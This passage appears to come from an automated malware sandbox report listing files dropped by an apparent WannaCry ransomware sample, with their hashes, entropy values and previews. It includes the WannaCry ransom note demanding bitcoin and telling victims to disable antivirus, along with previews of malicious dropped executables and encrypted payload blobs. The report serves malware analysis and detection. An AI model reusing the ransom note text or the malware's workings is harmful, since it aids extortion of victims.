                                SSDEEP:384:SheftipUENLFsPzy3EFHjHdy2MG2D7mgwroXeo75Y3kmA31dv61Qy5:Shef3jHdGG23KrDZrS14N
                                MD5:FF70CC7C00951084175D12128CE02399
                                SHA1:75AD3B1AD4FB14813882D88E952208C648F1FD18
                                SHA-256:CB5DA96B3DFCF4394713623DBF3831B2A0B8BE63987F563E1C32EDEB74CB6C3A
                                SHA-512:F01DF3256D49325E5EC49FD265AA3F176020C8FFEC60EB1D828C75A3FA18FF8634E1DE824D77DFDD833768ACFF1F547303104620C70066A2708654A07EF22E19
                                Malicious:false
                                Reputation:unknown
                                Preview:{\rtf1\adeflang1025\ansi\ansicpg1252\uc2\adeff31507\deff0\stshfdbch31505\stshfloch31506\stshfhich31506\stshfbi0\deflang1033\deflangfe1042\themelang1033\themelangfe1042\themelangcs0{\fonttbl{\f0\fbidi \froman\fcharset0\fprq2{\*\panose 02020603050405020304}Times New Roman;}{\f2\fbidi \fmodern\fcharset0\fprq1{\*\panose 02070309020205020404}Courier New;}..{\f34\fbidi \froman\fcharset0\fprq2{\*\panose 02040503050406030204}Cambria Math;}{\f36\fbidi \fmodern\fcharset129\fprq2{\*\panose 020b0503020000020004}\'b8\'bc\'c0\'ba \'b0\'ed\'b5\'f1;}..{\f37\fbidi \froman\fcharset0\fprq2{\*\panose 02040503050406030204}Cambria;}{\f40\fbidi \fmodern\fcharset129\fprq2{\*\panose 020b0503020000020004}@\'b8\'bc\'c0\'ba \'b0\'ed\'b5\'f1;}..{\f41\fbidi \fmodern\fcharset0\fprq1{\*\panose 020b0609020204030204}Consolas;}{\flomajor\f31500\fbidi \froman\fcharset0\fprq2{\*\panose 02020603050405020304}Times New Roman;}..{\fdbmajor\f31501\fbidi \fmodern\fcharset129\fprq2{\*\panose 020b0503020000020004}\'b8\'bc\'c0\'ba

                                C:\Users\user\Desktop\msg\m_polish.wnry

                                Download File
                                Process:C:\Users\user\Desktop\2N2jefqo8e.exe
                                File Type:Rich Text Format data, version 1, ANSI, code page 1252, default middle east language ID 1025
                                Category:dropped
                                Size (bytes):39896
                                Entropy (8bit):5.048541002474746
                                Encrypted:false
                                SSDEEP:384:SheftipUENLFsPzy3EFHjHdD2SG2gA8w8OJ6868jy8/8w8m8T848f8y858l8j8yv:Shef3jHdxG2KhuZrS14G
                                MD5:E79D7F2833A9C2E2553C7FE04A1B63F4
                                SHA1:3D9F56D2381B8FE16042AA7C4FEB1B33F2BAEBFF
                                SHA-256:519AD66009A6C127400C6C09E079903223BD82ECC18AD71B8E5CD79F5F9C053E
                                SHA-512:E0159C753491CAC7606A7250F332E87BC6B14876BC7A1CF5625FA56AB4F09C485F7B231DD52E4FF0F5F3C29862AFB1124C0EFD0741613EB97A83CBE2668AF5DE
                                Malicious:false
                                Reputation:unknown
                                Preview:{\rtf1\adeflang1025\ansi\ansicpg1252\uc2\adeff31507\deff0\stshfdbch31505\stshfloch31506\stshfhich31506\stshfbi0\deflang1033\deflangfe1042\themelang1033\themelangfe1042\themelangcs0{\fonttbl{\f0\fbidi \froman\fcharset0\fprq2{\*\panose 02020603050405020304}Times New Roman;}{\f2\fbidi \fmodern\fcharset0\fprq1{\*\panose 02070309020205020404}Courier New;}..{\f34\fbidi \froman\fcharset0\fprq2{\*\panose 02040503050406030204}Cambria Math;}{\f36\fbidi \fmodern\fcharset129\fprq2{\*\panose 020b0503020000020004}\'b8\'bc\'c0\'ba \'b0\'ed\'b5\'f1;}..{\f37\fbidi \froman\fcharset0\fprq2{\*\panose 02040503050406030204}Cambria;}{\f40\fbidi \fmodern\fcharset129\fprq2{\*\panose 020b0503020000020004}@\'b8\'bc\'c0\'ba \'b0\'ed\'b5\'f1;}..{\f41\fbidi \fmodern\fcharset0\fprq1{\*\panose 020b0609020204030204}Consolas;}{\flomajor\f31500\fbidi \froman\fcharset0\fprq2{\*\panose 02020603050405020304}Times New Roman;}..{\fdbmajor\f31501\fbidi \fmodern\fcharset129\fprq2{\*\panose 020b0503020000020004}\'b8\'bc\'c0\'ba

                                C:\Users\user\Desktop\msg\m_portuguese.wnry

                                Download File
                                Process:C:\Users\user\Desktop\2N2jefqo8e.exe
                                File Type:Rich Text Format data, version 1, ANSI, code page 1252, default middle east language ID 1025
                                Category:dropped
                                Size (bytes):37917
                                Entropy (8bit):5.027872281764284
                                Encrypted:false
                                SSDEEP:384:SheftipUENLFsPzy3EFHjHdy2QG2xgk5eo75Y3kmA31dv61QyV:Shef3jHdCG2EZrS14p
                                MD5:FA948F7D8DFB21CEDDD6794F2D56B44F
                                SHA1:CA915FBE020CAA88DD776D89632D7866F660FC7A
                                SHA-256:BD9F4B3AEDF4F81F37EC0A028AABCB0E9A900E6B4DE04E9271C8DB81432E2A66
                                SHA-512:0D211BFB0AE953081DCA00CD07F8C908C174FD6C47A8001FADC614203F0E55D9FBB7FA9B87C735D57101341AB36AF443918EE00737ED4C19ACE0A2B85497F41A
                                Malicious:false
                                Reputation:unknown
                                Preview:{\rtf1\adeflang1025\ansi\ansicpg1252\uc2\adeff31507\deff0\stshfdbch31505\stshfloch31506\stshfhich31506\stshfbi0\deflang1033\deflangfe1042\themelang1033\themelangfe1042\themelangcs0{\fonttbl{\f0\fbidi \froman\fcharset0\fprq2{\*\panose 02020603050405020304}Times New Roman;}{\f2\fbidi \fmodern\fcharset0\fprq1{\*\panose 02070309020205020404}Courier New;}..{\f34\fbidi \froman\fcharset0\fprq2{\*\panose 02040503050406030204}Cambria Math;}{\f36\fbidi \fmodern\fcharset129\fprq2{\*\panose 020b0503020000020004}\'b8\'bc\'c0\'ba \'b0\'ed\'b5\'f1;}..{\f37\fbidi \froman\fcharset0\fprq2{\*\panose 02040503050406030204}Cambria;}{\f40\fbidi \fmodern\fcharset129\fprq2{\*\panose 020b0503020000020004}@\'b8\'bc\'c0\'ba \'b0\'ed\'b5\'f1;}..{\f41\fbidi \fmodern\fcharset0\fprq1{\*\panose 020b0609020204030204}Consolas;}{\flomajor\f31500\fbidi \froman\fcharset0\fprq2{\*\panose 02020603050405020304}Times New Roman;}..{\fdbmajor\f31501\fbidi \fmodern\fcharset129\fprq2{\*\panose 020b0503020000020004}\'b8\'bc\'c0\'ba

                                C:\Users\user\Desktop\msg\m_romanian.wnry

                                Download File
                                Process:C:\Users\user\Desktop\2N2jefqo8e.exe
                                File Type:Rich Text Format data, version 1, ANSI, code page 1252, default middle east language ID 1025
                                Category:dropped
                                Size (bytes):52161
                                Entropy (8bit):4.964306949910696
                                Encrypted:false
                                SSDEEP:768:Shef3jHdXG2Cz2/vBAOZsQO0cLfnF/Zhcz7sDsYZBB/0gBjL+IU/hbhMVDtsR49P:ShehlrGR1m4dx9mjVyAvg7ouDT
                                MD5:313E0ECECD24F4FA1504118A11BC7986
                                SHA1:E1B9AE804C7FB1D27F39DB18DC0647BB04E75E9D
                                SHA-256:70C0F32ED379AE899E5AC975E20BBBACD295CF7CD50C36174D2602420C770AC1
                                SHA-512:C7500363C61BAF8B77FCE796D750F8F5E6886FF0A10F81C3240EA3AD4E5F101B597490DEA8AB6BD9193457D35D8FD579FCE1B88A1C8D85EBE96C66D909630730
                                Malicious:false
                                Reputation:unknown
                                Preview:{\rtf1\adeflang1025\ansi\ansicpg1252\uc2\adeff31507\deff0\stshfdbch31505\stshfloch31506\stshfhich31506\stshfbi0\deflang1033\deflangfe1042\themelang1033\themelangfe1042\themelangcs0{\fonttbl{\f0\fbidi \froman\fcharset0\fprq2{\*\panose 02020603050405020304}Times New Roman;}{\f2\fbidi \fmodern\fcharset0\fprq1{\*\panose 02070309020205020404}Courier New;}..{\f34\fbidi \froman\fcharset0\fprq2{\*\panose 02040503050406030204}Cambria Math;}{\f36\fbidi \fmodern\fcharset129\fprq2{\*\panose 020b0503020000020004}\'b8\'bc\'c0\'ba \'b0\'ed\'b5\'f1;}..{\f37\fbidi \froman\fcharset0\fprq2{\*\panose 02040503050406030204}Cambria;}{\f40\fbidi \fmodern\fcharset129\fprq2{\*\panose 020b0503020000020004}@\'b8\'bc\'c0\'ba \'b0\'ed\'b5\'f1;}..{\f41\fbidi \fmodern\fcharset0\fprq1{\*\panose 020b0609020204030204}Consolas;}{\flomajor\f31500\fbidi \froman\fcharset0\fprq2{\*\panose 02020603050405020304}Times New Roman;}..{\fdbmajor\f31501\fbidi \fmodern\fcharset129\fprq2{\*\panose 020b0503020000020004}\'b8\'bc\'c0\'ba

                                C:\Users\user\Desktop\msg\m_russian.wnry

                                Download File
                                Process:C:\Users\user\Desktop\2N2jefqo8e.exe
                                File Type:Rich Text Format data, version 1, ANSI, code page 1252, default middle east language ID 1025
                                Category:dropped
                                Size (bytes):47108
                                Entropy (8bit):4.952777691675008
                                Encrypted:false
                                SSDEEP:384:SheftipUENLFsPzy3EFHjHdg2qG2aUGs0K6lyZqmfGGHRblldORZeo75Y3kmA31L:Shef3jHdeG2lGsDOcZxbP7ZrS14K
                                MD5:452615DB2336D60AF7E2057481E4CAB5
                                SHA1:442E31F6556B3D7DE6EB85FBAC3D2957B7F5EAC6
                                SHA-256:02932052FAFE97E6ACAAF9F391738A3A826F5434B1A013ABBFA7A6C1ADE1E078
                                SHA-512:7613DC329ABE7A3F32164C9A6B660F209A84B774AB9C008BF6503C76255B30EA9A743A6DC49A8DE8DF0BCB9AEA5A33F7408BA27848D9562583FF51991910911F
                                Malicious:false
                                Reputation:unknown
                                Preview:{\rtf1\adeflang1025\ansi\ansicpg1252\uc2\adeff31507\deff0\stshfdbch31505\stshfloch31506\stshfhich31506\stshfbi0\deflang1033\deflangfe1042\themelang1033\themelangfe1042\themelangcs0{\fonttbl{\f0\fbidi \froman\fcharset0\fprq2{\*\panose 02020603050405020304}Times New Roman;}{\f2\fbidi \fmodern\fcharset0\fprq1{\*\panose 02070309020205020404}Courier New;}..{\f34\fbidi \froman\fcharset0\fprq2{\*\panose 02040503050406030204}Cambria Math;}{\f36\fbidi \fmodern\fcharset129\fprq2{\*\panose 020b0503020000020004}\'b8\'bc\'c0\'ba \'b0\'ed\'b5\'f1;}..{\f37\fbidi \froman\fcharset0\fprq2{\*\panose 02040503050406030204}Cambria;}{\f40\fbidi \fmodern\fcharset129\fprq2{\*\panose 020b0503020000020004}@\'b8\'bc\'c0\'ba \'b0\'ed\'b5\'f1;}..{\f41\fbidi \fmodern\fcharset0\fprq1{\*\panose 020b0609020204030204}Consolas;}{\flomajor\f31500\fbidi \froman\fcharset0\fprq2{\*\panose 02020603050405020304}Times New Roman;}..{\fdbmajor\f31501\fbidi \fmodern\fcharset129\fprq2{\*\panose 020b0503020000020004}\'b8\'bc\'c0\'ba

                                C:\Users\user\Desktop\msg\m_slovak.wnry

                                Download File
                                Process:C:\Users\user\Desktop\2N2jefqo8e.exe
                                File Type:Rich Text Format data, version 1, ANSI, code page 1252, default middle east language ID 1025
                                Category:dropped
                                Size (bytes):41391
                                Entropy (8bit):5.027730966276624
                                Encrypted:false
                                SSDEEP:384:SheftipUENLFsPzy3EFHjHd4Yb2YG2gNZ8a8zV/8j8U8l8x838Z8Q808m8d8T8hw:Shef3jHdZvG23AZrS14f
                                MD5:C911ABA4AB1DA6C28CF86338AB2AB6CC
                                SHA1:FEE0FD58B8EFE76077620D8ABC7500DBFEF7C5B0
                                SHA-256:E64178E339C8E10EAC17A236A67B892D0447EB67B1DCD149763DAD6FD9F72729
                                SHA-512:3491ED285A091A123A1A6D61AAFBB8D5621CCC9E045A237A2F9C2CF6049E7420EB96EF30FDCEA856B50454436E2EC468770F8D585752D73FAFD676C4EF5E800A
                                Malicious:false
                                Reputation:unknown
                                Preview:{\rtf1\adeflang1025\ansi\ansicpg1252\uc2\adeff31507\deff0\stshfdbch31505\stshfloch31506\stshfhich31506\stshfbi0\deflang1033\deflangfe1042\themelang1033\themelangfe1042\themelangcs0{\fonttbl{\f0\fbidi \froman\fcharset0\fprq2{\*\panose 02020603050405020304}Times New Roman;}{\f2\fbidi \fmodern\fcharset0\fprq1{\*\panose 02070309020205020404}Courier New;}..{\f34\fbidi \froman\fcharset0\fprq2{\*\panose 02040503050406030204}Cambria Math;}{\f36\fbidi \fmodern\fcharset129\fprq2{\*\panose 020b0503020000020004}\'b8\'bc\'c0\'ba \'b0\'ed\'b5\'f1;}..{\f37\fbidi \froman\fcharset0\fprq2{\*\panose 02040503050406030204}Cambria;}{\f40\fbidi \fmodern\fcharset129\fprq2{\*\panose 020b0503020000020004}@\'b8\'bc\'c0\'ba \'b0\'ed\'b5\'f1;}..{\f41\fbidi \fmodern\fcharset0\fprq1{\*\panose 020b0609020204030204}Consolas;}{\flomajor\f31500\fbidi \froman\fcharset0\fprq2{\*\panose 02020603050405020304}Times New Roman;}..{\fdbmajor\f31501\fbidi \fmodern\fcharset129\fprq2{\*\panose 020b0503020000020004}\'b8\'bc\'c0\'ba

                                C:\Users\user\Desktop\msg\m_spanish.wnry

                                Download File
                                Process:C:\Users\user\Desktop\2N2jefqo8e.exe
                                File Type:Rich Text Format data, version 1, ANSI, code page 1252, default middle east language ID 1025
                                Category:dropped
                                Size (bytes):37381
                                Entropy (8bit):5.02443306661187
                                Encrypted:false
                                SSDEEP:384:SheftipUENLFsPzy3EFHjHdf24G2/ezV6YQUdZYlujeMQ9RXmhRweo75Y3kmA31S:Shef3jHdrG2fuhZrS14T
                                MD5:8D61648D34CBA8AE9D1E2A219019ADD1
                                SHA1:2091E42FC17A0CC2F235650F7AAD87ABF8BA22C2
                                SHA-256:72F20024B2F69B45A1391F0A6474E9F6349625CE329F5444AEC7401FE31F8DE1
                                SHA-512:68489C33BA89EDFE2E3AEBAACF8EF848D2EA88DCBEF9609C258662605E02D12CFA4FFDC1D266FC5878488E296D2848B2CB0BBD45F1E86EF959BAB6162D284079
                                Malicious:false
                                Reputation:unknown
                                Preview:{\rtf1\adeflang1025\ansi\ansicpg1252\uc2\adeff31507\deff0\stshfdbch31505\stshfloch31506\stshfhich31506\stshfbi0\deflang1033\deflangfe1042\themelang1033\themelangfe1042\themelangcs0{\fonttbl{\f0\fbidi \froman\fcharset0\fprq2{\*\panose 02020603050405020304}Times New Roman;}{\f2\fbidi \fmodern\fcharset0\fprq1{\*\panose 02070309020205020404}Courier New;}..{\f34\fbidi \froman\fcharset0\fprq2{\*\panose 02040503050406030204}Cambria Math;}{\f36\fbidi \fmodern\fcharset129\fprq2{\*\panose 020b0503020000020004}\'b8\'bc\'c0\'ba \'b0\'ed\'b5\'f1;}..{\f37\fbidi \froman\fcharset0\fprq2{\*\panose 02040503050406030204}Cambria;}{\f40\fbidi \fmodern\fcharset129\fprq2{\*\panose 020b0503020000020004}@\'b8\'bc\'c0\'ba \'b0\'ed\'b5\'f1;}..{\f41\fbidi \fmodern\fcharset0\fprq1{\*\panose 020b0609020204030204}Consolas;}{\flomajor\f31500\fbidi \froman\fcharset0\fprq2{\*\panose 02020603050405020304}Times New Roman;}..{\fdbmajor\f31501\fbidi \fmodern\fcharset129\fprq2{\*\panose 020b0503020000020004}\'b8\'bc\'c0\'ba

                                C:\Users\user\Desktop\msg\m_swedish.wnry

                                Download File
                                Process:C:\Users\user\Desktop\2N2jefqo8e.exe
                                File Type:Rich Text Format data, version 1, ANSI, code page 1252, default middle east language ID 1025
                                Category:dropped
                                Size (bytes):38483
                                Entropy (8bit):5.022972736625151
                                Encrypted:false
                                SSDEEP:384:SheftipUENLFsPzy3EFHjHdb24G2ZKLVdDeo75Y3kmA31dv61QyE:Shef3jHd/G2w6ZrS14w
                                MD5:C7A19984EB9F37198652EAF2FD1EE25C
                                SHA1:06EAFED025CF8C4D76966BF382AB0C5E1BD6A0AE
                                SHA-256:146F61DB72297C9C0FACFFD560487F8D6A2846ECEC92ECC7DB19C8D618DBC3A4
                                SHA-512:43DD159F9C2EAC147CBFF1DDA83F6A83DD0C59D2D7ACAC35BA8B407A04EC9A1110A6A8737535D060D100EDE1CB75078CF742C383948C9D4037EF459D150F6020
                                Malicious:false
                                Reputation:unknown
                                Preview:{\rtf1\adeflang1025\ansi\ansicpg1252\uc2\adeff31507\deff0\stshfdbch31505\stshfloch31506\stshfhich31506\stshfbi0\deflang1033\deflangfe1042\themelang1033\themelangfe1042\themelangcs0{\fonttbl{\f0\fbidi \froman\fcharset0\fprq2{\*\panose 02020603050405020304}Times New Roman;}{\f2\fbidi \fmodern\fcharset0\fprq1{\*\panose 02070309020205020404}Courier New;}..{\f34\fbidi \froman\fcharset0\fprq2{\*\panose 02040503050406030204}Cambria Math;}{\f36\fbidi \fmodern\fcharset129\fprq2{\*\panose 020b0503020000020004}\'b8\'bc\'c0\'ba \'b0\'ed\'b5\'f1;}..{\f37\fbidi \froman\fcharset0\fprq2{\*\panose 02040503050406030204}Cambria;}{\f40\fbidi \fmodern\fcharset129\fprq2{\*\panose 020b0503020000020004}@\'b8\'bc\'c0\'ba \'b0\'ed\'b5\'f1;}..{\f41\fbidi \fmodern\fcharset0\fprq1{\*\panose 020b0609020204030204}Consolas;}{\flomajor\f31500\fbidi \froman\fcharset0\fprq2{\*\panose 02020603050405020304}Times New Roman;}..{\fdbmajor\f31501\fbidi \fmodern\fcharset129\fprq2{\*\panose 020b0503020000020004}\'b8\'bc\'c0\'ba

                                C:\Users\user\Desktop\msg\m_turkish.wnry

                                Download File
                                Process:C:\Users\user\Desktop\2N2jefqo8e.exe
                                File Type:Rich Text Format data, version 1, ANSI, code page 1252, default middle east language ID 1025
                                Category:dropped
                                Size (bytes):42582
                                Entropy (8bit):5.010722377068833
                                Encrypted:false
                                SSDEEP:384:SheftipUENLFsPzy3EFHjHds42WG2mzGu/eo75Y3kmA31dv61QyZ:Shef3jHdsiG2moZrS149
                                MD5:531BA6B1A5460FC9446946F91CC8C94B
                                SHA1:CC56978681BD546FD82D87926B5D9905C92A5803
                                SHA-256:6DB650836D64350BBDE2AB324407B8E474FC041098C41ECAC6FD77D632A36415
                                SHA-512:EF25C3CF4343DF85954114F59933C7CC8107266C8BCAC3B5EA7718EB74DBEE8CA8A02DA39057E6EF26B64F1DFCCD720DD3BF473F5AE340BA56941E87D6B796C9
                                Malicious:false
                                Reputation:unknown
                                Preview:{\rtf1\adeflang1025\ansi\ansicpg1252\uc2\adeff31507\deff0\stshfdbch31505\stshfloch31506\stshfhich31506\stshfbi0\deflang1033\deflangfe1042\themelang1033\themelangfe1042\themelangcs0{\fonttbl{\f0\fbidi \froman\fcharset0\fprq2{\*\panose 02020603050405020304}Times New Roman;}{\f2\fbidi \fmodern\fcharset0\fprq1{\*\panose 02070309020205020404}Courier New;}..{\f34\fbidi \froman\fcharset0\fprq2{\*\panose 02040503050406030204}Cambria Math;}{\f36\fbidi \fmodern\fcharset129\fprq2{\*\panose 020b0503020000020004}\'b8\'bc\'c0\'ba \'b0\'ed\'b5\'f1;}..{\f37\fbidi \froman\fcharset0\fprq2{\*\panose 02040503050406030204}Cambria;}{\f40\fbidi \fmodern\fcharset129\fprq2{\*\panose 020b0503020000020004}@\'b8\'bc\'c0\'ba \'b0\'ed\'b5\'f1;}..{\f41\fbidi \fmodern\fcharset0\fprq1{\*\panose 020b0609020204030204}Consolas;}{\flomajor\f31500\fbidi \froman\fcharset0\fprq2{\*\panose 02020603050405020304}Times New Roman;}..{\fdbmajor\f31501\fbidi \fmodern\fcharset129\fprq2{\*\panose 020b0503020000020004}\'b8\'bc\'c0\'ba

                                C:\Users\user\Desktop\msg\m_vietnamese.wnry

                                Download File
                                Process:C:\Users\user\Desktop\2N2jefqo8e.exe
                                File Type:Rich Text Format data, version 1, ANSI, code page 1252, default middle east language ID 1025
                                Category:dropped
                                Size (bytes):93778
                                Entropy (8bit):4.76206134900188
                                Encrypted:false
                                SSDEEP:384:SheftipUENLFsPzy3EFHjHdW2YG22cViQj3KiG8dpcH8iEriG8E8O83Jz52sxG8h:Shef3jHdWG2+oPZrS14i
                                MD5:8419BE28A0DCEC3F55823620922B00FA
                                SHA1:2E4791F9CDFCA8ABF345D606F313D22B36C46B92
                                SHA-256:1F21838B244C80F8BED6F6977AA8A557B419CF22BA35B1FD4BF0F98989C5BDF8
                                SHA-512:8FCA77E54480AEA3C0C7A705263ED8FB83C58974F5F0F62F12CC97C8E0506BA2CDB59B70E59E9A6C44DD7CDE6ADEEEC35B494D31A6A146FF5BA7006136AB9386
                                Malicious:false
                                Reputation:unknown
                                Preview:{\rtf1\adeflang1025\ansi\ansicpg1252\uc2\adeff31507\deff0\stshfdbch31505\stshfloch31506\stshfhich31506\stshfbi0\deflang1033\deflangfe1042\themelang1033\themelangfe1042\themelangcs0{\fonttbl{\f0\fbidi \froman\fcharset0\fprq2{\*\panose 02020603050405020304}Times New Roman;}{\f2\fbidi \fmodern\fcharset0\fprq1{\*\panose 02070309020205020404}Courier New;}..{\f34\fbidi \froman\fcharset0\fprq2{\*\panose 02040503050406030204}Cambria Math;}{\f36\fbidi \fmodern\fcharset129\fprq2{\*\panose 020b0503020000020004}\'b8\'bc\'c0\'ba \'b0\'ed\'b5\'f1;}..{\f37\fbidi \froman\fcharset0\fprq2{\*\panose 02040503050406030204}Cambria;}{\f40\fbidi \fmodern\fcharset129\fprq2{\*\panose 020b0503020000020004}@\'b8\'bc\'c0\'ba \'b0\'ed\'b5\'f1;}..{\f41\fbidi \fmodern\fcharset0\fprq1{\*\panose 020b0609020204030204}Consolas;}{\flomajor\f31500\fbidi \froman\fcharset0\fprq2{\*\panose 02020603050405020304}Times New Roman;}..{\fdbmajor\f31501\fbidi \fmodern\fcharset129\fprq2{\*\panose 020b0503020000020004}\'b8\'bc\'c0\'ba

                                C:\Users\user\Desktop\r.wnry

                                Download File
                                Process:C:\Users\user\Desktop\2N2jefqo8e.exe
                                File Type:ASCII text, with CRLF line terminators
                                Category:dropped
                                Size (bytes):864
                                Entropy (8bit):4.5335184780121995
                                Encrypted:false
                                SSDEEP:24:ptrPzDVR5Gi3OzGm0Ei5bnBR7brW8PNAi0eEprY+Ai75wRZce/:DZD36W5/vWmMo+m
                                MD5:3E0020FC529B1C2A061016DD2469BA96
                                SHA1:C3A91C22B63F6FE709E7C29CAFB29A2EE83E6ADE
                                SHA-256:402751FA49E0CB68FE052CB3DB87B05E71C1D950984D339940CF6B29409F2A7C
                                SHA-512:5CA3C134201ED39D96D72911C0498BAE6F98701513FD7F1DC8512819B673F0EA580510FA94ED9413CCC73DA18B39903772A7CBFA3478176181CEE68C896E14CF
                                Malicious:false
                                Yara Hits:
                                • Rule: WannaCry_RansomNote, Description: Detects WannaCry Ransomware Note, Source: C:\Users\user\Desktop\r.wnry, Author: Florian Roth
                                Reputation:unknown
                                Preview:Q: What's wrong with my files?....A: Ooops, your important files are encrypted. It means you will not be able to access them anymore until they are decrypted... If you follow our instructions, we guarantee that you can decrypt all your files quickly and safely!.. Let's start decrypting!....Q: What do I do?....A: First, you need to pay service fees for the decryption... Please send %s to this bitcoin address: %s.... Next, please find an application file named "%s". It is the decrypt software... Run and follow the instructions! (You may need to disable your antivirus for a while.).. ..Q: How can I trust?....A: Don't worry about decryption... We will decrypt your files surely because nobody will trust us if we cheat users... ....* If you need our assistance, send a message by clicking <Contact Us> on the decryptor window...

                                C:\Users\user\Desktop\s.wnry

                                Download File
                                Process:C:\Users\user\Desktop\2N2jefqo8e.exe
                                File Type:Zip archive data, at least v1.0 to extract, compression method=store
                                Category:dropped
                                Size (bytes):3038286
                                Entropy (8bit):7.998263053003918
                                Encrypted:true
                                SSDEEP:49152:zUx4db9A1iRdHAHZXaTnCshuTnSQYUB/UZfCg2clOQin2h37l2Jh9iiRKpbXUSH:z/b96AdHA5XaTJvQYUBBgRlJi+rlliRy
                                MD5:AD4C9DE7C8C40813F200BA1C2FA33083
                                SHA1:D1AF27518D455D432B62D73C6A1497D032F6120E
                                SHA-256:E18FDD912DFE5B45776E68D578C3AF3547886CF1353D7086C8BEE037436DFF4B
                                SHA-512:115733D08E5F1A514808A20B070DB7FF453FD149865F49C04365A8C6502FA1E5C3A31DA3E21F688AB040F583CF1224A544AEA9708FFAB21405DDE1C57F98E617
                                Malicious:true
                                Reputation:unknown
                                Preview:PK..........!(................Data/PK........M..J................Data/Tor/PK..........!(................Tor/PK..........!(..t.......0.....Tor/libeay32.dll.:.t.e....6m.....Me.Vjil....!..E..T..e...*..e....,.c..o=..t.u..,....J..k-.x.V..:1u....v..7.L~..?{..rN23.w......o..N2....WU..G..G.......Ed..7..q.o.5.]w.{...wl\y..m..w...?]......n......Z]UX./h4.....]...71....e.\^1..I..MH5...k.o+..s...c|s....-#d,!..............eW...?a.......R..I..R......w.....m..#od.*q.&..g.;.C(..t.V...j.Jq%...d_.Js...Hk.j#...DH.....,8_.O...]U....t .......ks:..T...18.C.%ASZJ3.U.nl..J.@)...$...N.s.O........m.0..*e..4.....m...lI..Z..7.f-.?....;...?.SO....}..7#.L8...5.z.~.........E.S..1....7.*.0...pf.....jz.)..Y..8..^....B........p.W..r..B.....p..?......../`*Wl..D.xAi..$..d.......&..p. ..bOtE.\.......(..&A...6v..S..Q...L...3 .:.6.m7.'.......)......iH.NZ_t.;./.a..n.g...A`.T.k.........."...<.rt..3....0.{N..yy...p.z.=..#.u.u...d......mQ..*.H..2.N.BRSN...XC....).".@.._.18.&...n

                                C:\Users\user\Desktop\t.wnry

                                Download File
                                Process:C:\Users\user\Desktop\2N2jefqo8e.exe
                                File Type:data
                                Category:dropped
                                Size (bytes):65816
                                Entropy (8bit):7.997276137881339
                                Encrypted:true
                                SSDEEP:1536:am+vLII5ygV8/tuH+P9zxqDKvARpmKiRMkTERU:a9LAg4tXPTEKvADmFgRU
                                MD5:5DCAAC857E695A65F5C3EF1441A73A8F
                                SHA1:7B10AAEEE05E7A1EFB43D9F837E9356AD55C07DD
                                SHA-256:97EBCE49B14C46BEBC9EC2448D00E1E397123B256E2BE9EBA5140688E7BC0AE6
                                SHA-512:06EB5E49D19B71A99770D1B11A5BB64A54BF3352F36E39A153469E54205075C203B08128DC2317259DB206AB5323BDD93AAA252A066F57FB5C52FF28DEEDB5E2
                                Malicious:true
                                Reputation:unknown
                                Preview:WANACRY!.....8"'....].~>(...*PdIf.'.m>...2.0.`p...^...#I|..<.W.B.=....M..zxFp....0e...P...."....nhB)>....B..}.[d$......,...8.....k$.....S.w+.....N.....p/...Y.LC......9L.\!u...?hH".<d..dS%A.......Iu...nEi7I.....8.V..:F....-...,........\....}..`1?..m..5g.I'..................q.\..9`..t.....a......(|.8.L....67.gjrS.|.e...f.Fi......\...r.k.!d......8.'g1y+..'.i1t.L.>.u..:......<.fN.:Tf{..M.....W....._......_:...rR(.M..A?:...H.W.....=l......r..f..JX...:.z.rC.....f.X Qx.4....2....&w+..&kDqFU..u.............Sg..4k..<5.Zd$F.ED...1.S.d.. .eW.i....p.2..&.~S.l.R8$&q.L3.<.2....x ..by.zO.w. .hs.q.....I.1..D.F...J).&.....SD..v..m...V.....G...B`.u>K@.\_N......#.|..w.....Z.).X..[..o.(.'.~.nq.hq1.....:!.Q.P...c.KA,.3..m...j>.X.;..<.*."AU..R....Y....d]....U....).@...Q....|K.=.d.cI.x.....O...\(.%}.j..YG}...i.....R..j.`..9...5.....o..U...xu>+.$y...z... ...5......s..e...G...W.".T.'..iH..B.Sl...h..7B..E.8.....K.bRm...FE..W'_Q1...... ...A.5.}..%.../^VL.;.".w

                                C:\Users\user\Desktop\taskdl.exe

                                Download File
                                Process:C:\Users\user\Desktop\2N2jefqo8e.exe
                                File Type:PE32 executable (GUI) Intel 80386, for MS Windows
                                Category:dropped
                                Size (bytes):20480
                                Entropy (8bit):3.1664845408760636
                                Encrypted:false
                                SSDEEP:96:Udocv5e0e1wWtaLYjJN0yDGgI2u9+w5eOIMviS0jPtboyn15EWBwwWwT:6oL0edtJN7qvAZM6S0jP1oynkWBwwWg
                                MD5:4FEF5E34143E646DBF9907C4374276F5
                                SHA1:47A9AD4125B6BD7C55E4E7DA251E23F089407B8F
                                SHA-256:4A468603FDCB7A2EB5770705898CF9EF37AADE532A7964642ECD705A74794B79
                                SHA-512:4550DD1787DEB353EBD28363DD2CDCCCA861F6A5D9358120FA6AA23BAA478B2A9EB43CEF5E3F6426F708A0753491710AC05483FAC4A046C26BEC4234122434D5
                                Malicious:true
                                Antivirus:
                                • Antivirus: ReversingLabs, Detection: 89%
                                Reputation:unknown
                                Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......=..y..y..y......x......r......x......}.....z..y..Q..O..x..Richy..........PE..L...W.[J.....................0............... ....@..........................P...............................................!..P....@............................................................................... ...............................text............................... ..`.rdata..z.... ....... ..............@..@.data........0.......0..............@....rsrc........@.......@..............@..@........................................................................................................................................................................................................................................................................................................................................................................................

                                C:\Users\user\Desktop\taskse.exe

                                Download File
                                Process:C:\Users\user\Desktop\2N2jefqo8e.exe
                                File Type:PE32 executable (GUI) Intel 80386, for MS Windows
                                Category:dropped
                                Size (bytes):20480
                                Entropy (8bit):2.5252509618107535
                                Encrypted:false
                                SSDEEP:96:UjpvOHheaCDCNIOgTegoddPtboyX7cvp0EWy1HlWwr:UjVWEam7ofP1oyX7olWUHlW0
                                MD5:8495400F199AC77853C53B5A3F278F3E
                                SHA1:BE5D6279874DA315E3080B06083757AAD9B32C23
                                SHA-256:2CA2D550E603D74DEDDA03156023135B38DA3630CB014E3D00B1263358C5F00D
                                SHA-512:0669C524A295A049FA4629B26F89788B2A74E1840BCDC50E093A0BD40830DD1279C9597937301C0072DB6ECE70ADEE4ACE67C3C8A4FB2DB6DEAFD8F1E887ABE4
                                Malicious:true
                                Antivirus:
                                • Antivirus: ReversingLabs, Detection: 89%
                                Reputation:unknown
